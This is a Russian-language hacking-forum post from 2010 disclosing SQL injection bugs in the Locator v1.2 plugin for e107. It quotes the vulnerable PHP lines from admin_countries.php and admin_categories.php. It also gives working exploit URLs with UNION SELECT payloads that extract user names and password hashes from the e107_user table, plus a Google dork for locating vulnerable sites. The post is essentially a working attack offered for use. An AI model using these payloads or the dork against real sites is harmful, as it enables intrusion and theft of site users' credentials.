Показать сообщение отдельно

  #96  
Старый 14.12.2010, 19:07
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Locator v1.2

Необходимы права администратора, SQL injection:

/admin_countries.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DB_TABLE_LOCATOR_COUNTRY[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"locator_country_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locator_country_id'[/COLOR][COLOR="#007700"]]);

[/
COLOR][/COLOR
Пример:

Код:
Code:
http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
Необходимы права администратора, SQL injection:

/admin_categories.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DB_TABLE_LOCATOR_TABLE[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"locator_cat_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locator_cat_id'[/COLOR][COLOR="#007700"]]);

[/
COLOR][/COLOR
Пример:

Код:
Code:
http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
В админке ещё много чего бажного.

Дорк:inurl:e107_plugins/locator/
 
Ответить с цитированием